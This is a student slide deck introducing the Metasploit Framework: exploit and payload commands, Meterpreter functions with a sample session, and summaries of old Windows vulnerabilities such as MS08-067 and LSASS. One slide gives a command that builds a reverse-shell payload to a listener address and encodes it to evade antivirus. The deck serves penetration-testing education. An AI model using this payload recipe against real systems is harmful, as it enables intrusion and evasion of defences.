This vulnerability allows remote code execution if a target receives a specially crafted RPC request. An attacker could exploit it without authentication to run arbitrary code on Windows 2000, XP, and 2003 systems. Best practices like firewalls can help protect networks from outside attacks. The vulnerability is caused by unchecked buffers in the LSASS service.
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
metaploit framework
1. Lê Đức Quyền 08130075
Cao Ngô Nhật thanh 08130081
2. • “The Metasploit Framework is an advanced open-source
for attacking, testing, and using exploit code.”
• Metasploit software helps security and IT professionals
identify security issues, verify vulnerability in system.
• Perform penetration tests
• Overt penetration testing
• Covert penetration testing
• Consists of tools, libraries, modules, and user interfaces.
These are configured and combined to launch an exploit.
• Written in Ruby.
3. • Professional approach to penetration testing:
– Automation
– Reconnaissance, exploitation.
• All in one Solution
– Multi-platform
– Diverse range of target applications
• Open Source
– Custom payloads
4.
5. • Choose module exploit:
• show exploits: list available exploits within the framework
• use exploit_name: choose exploit
• info exploit_name: view information about exploit
• Choose payload
• Show payloads: show only the payloads that are com-patible
with chosen module.
• Info payload_name: view detail information about payload
• set payload payload_name: choose payload
6. • Configure chosen payload.
• show options: view the options which you must configure
• set option_name value: configure option
• show advanceds: show advance options
• check: verify options are configured whether exactly or not
• show targets: list vulnerable potential targets.
• set TARGET value: choose target.
• exploit: initiates our exploit and attempts to attack the target
7. Meterpreter, short for The Meta -Interpreter is an advanced
payload that is included in the Metaploit Framework. Its
purpose is to provide complex command for exploiting and
attacking remote machine. The way that it accomplishes
this is by allowing developers to write their own extensions
in the form of shared object (DLL) files that can be
uploaded and injected into a running process on a target
computer after exploitation has occurred.
8. • Fs: Provides interaction with the filesystem on the
remote machine.
• Net: Provides interaction with the network stack on the
remote machine.
• Process: Provides interaction with processes on the
remote machine .
• Sys: Provides interaction with the environment on the
remote machine
9. • screenshot: capture desktop screen of victim
• sysinfo: view information about platform of victim
• meterpreter > sysinfo
Computer: IHAZSECURITY
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
10. • execute: executes a process on the remote endpoint
• kill: terminate one or more processes on the remote
endpoint
• Ps: list processes on the remote endpoint
11. Meterpreter> execute -f cmd –c
execute: success, process id is 3516.
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive
console on 1...
interact: Started interactive channel 1.
Microsoft Windows XP [Version
5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:WINDOWS>ipconfig
12. • Encoding payload with MSFencode
root@bt:/# msfpayload windows/shell_reverse_tcp
LHOST=192.168.1.101 LPORT=31337 R |msfencode -e
x86/shikata_ga_nai -t exe > /var/www/payload2.exe
• Multi-encoding: allows the payload to be encoded several times
to throw off antivirus programs
13.
14. •Vulnerability in Server Service Could Allow Remote Code
Execution (958644)
•The vulnerability could allow remote code execution if an
affected system received a specially crafted RPC request.
On Microsoft Windows 2000, Windows XP, and Windows
Server 2003 systems, an attacker could exploit this
vulnerability without authentication to run arbitrary code.
•Firewall best practices and standard default firewall
configurations can help protect network resources from
attacks that originate outside the enterprise perimeter.
http://technet.microsoft.com/en-us/security/bulletin/ms08-
067
15. LSASS Vulnerability - CAN-2003-0533
Impact of vulnerability: Remote Code Execution
An attacker who successfully exploited the most severe of
these vulnerabilities could take complete control of an
affected system, including installing programs; viewing,
changing, or deleting data; or creating new accounts that
have full privileges.
This vulnerability is caused by an unchecked buffer in the
LSASS service.
16. • This is a remote code execution vulnerability. An attacker who successfully
exploited this vulnerability could take complete control of an affected system.
An attacker could then install programs; view, change, or delete data; or
create new accounts.
• Systems are only vulnerable to remote attack when sharing a printer and the
remote attacker can access the printer share.
•This vulnerability is caused when the Windows Print Spooler insufficiently
restricts user permissions to access print spoolers.
•Firewall best practices and standard default firewall configurations can help
protect networks from attacks that originate outside the enterprise perimeter.
Best practices recommend that systems that are connected to the Internet
have a minimal number of ports exposed.
•http://technet.microsoft.com/en-us/security/bulletin/MS10-061
17. • This vulnerability is caused by the Windows RPCSS service does not
properly check message inputs under certain circumstances. After
establishing a connection, an attacker could send a specially crafted
malformed RPC message to cause the underlying Distributed Component
Object Model (DCOM) process on the remote system to fail in such a way that
arbitrary code could be executed.
• To exploit this vulnerability, the attacker would require the ability to send a
specially crafted request to port 135, 139, 445 or 593 or any other specifically
configured RPC port on the remote machine.
•Best practices recommend blocking all TCP/IP ports that are not actually
being used
18. • A remote code execution vulnerability exists in the ActiveX
control for the Snapshot Viewer for Microsoft Access. An
attacker could exploit the vulnerability by constructing a
specially crafted Web page. When a user views the Web
page, the vulnerability could allow remote code execution.
An attacker who successfully exploited this vulnerability
could gain the same user rights as the logged-on user.
• http://technet.microsoft.com/en-
us/security/bulletin/MS08-041
Notes de l'éditeur
Interact 1:Bắt đầu một phiên làm việc với channel vừa thiết lập với remote machine